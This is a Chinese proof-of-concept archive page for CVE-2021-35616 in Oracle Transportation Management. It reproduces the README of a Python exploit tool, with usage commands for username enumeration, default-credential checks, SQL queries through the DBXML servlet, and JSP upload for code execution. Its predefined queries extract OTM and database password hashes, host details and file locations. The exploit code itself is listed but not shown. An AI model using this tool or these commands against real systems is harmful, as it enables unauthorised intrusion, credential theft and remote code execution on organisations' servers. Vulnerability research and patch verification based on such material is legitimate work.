关联漏洞
标题:
Oracle Transportation Management 安全漏洞
(CVE-2021-35616)
描述:Oracle Transportation Management(Otm)是美国甲骨文(Oracle)公司的一种面向托运人和物流供应商的工具。用于提供运输规划和执行功能,并将运输规划、执行、运费支付和业务流程自动化集成到一个跨所有运输模式的应用程序上。 Oracle Supply Chain存在安全漏洞,该漏洞源于Oracle Supply Chain 的 Oracle 运输管理产品中的漏洞(组件:UI 基础设施)。受影响的受支持版本是 6.4.3。容易利用的漏洞允许通过 HTTP 访问网络的低特权攻击者
描述
Python tool for exploiting CVE-2021-35616
介绍
# OracleOTM
Python tool for exploiting CVE-2021-35616
The script works in modules, which I implemented in the following order:
► Username enumeration
► Search for default credentials
► Run an SQL query using DBXML servlet
► Full exploitation and JSP execution
The syntax of the script is as follows:
.\OracleOTM.py {module} {host TXT file} {additional parameters}
Username enumeration: .\OracleOTM.py enum {hosts TXT file} -u users.txt
Search for default credentials: .\OracleOTM.py default {hosts TXT file}
Run an SQL query using DBXML servlet: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
I also prepared some predefined queries that I found useful; you can access them directly, as follows:
.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os
OS – Extract the server’s OS
Osuser – Extract the OS user running the DB
Hostname – DB server host name
Hostip – DB server IP address
Passwords – Extracts the OTM users and their hashed passwords
Oraversion – The DB version
Dbusershash – The DB users’ password hashes
Dbfileslocation – The location of the DB files in the OS
Full exploitation and JSP execution: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"
文件快照
[4.0K] /data/pocs/6df38a15d062d8e94f9919012e6187ff53909b12
├── [ 19K] OracleOTM.py
└── [1.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。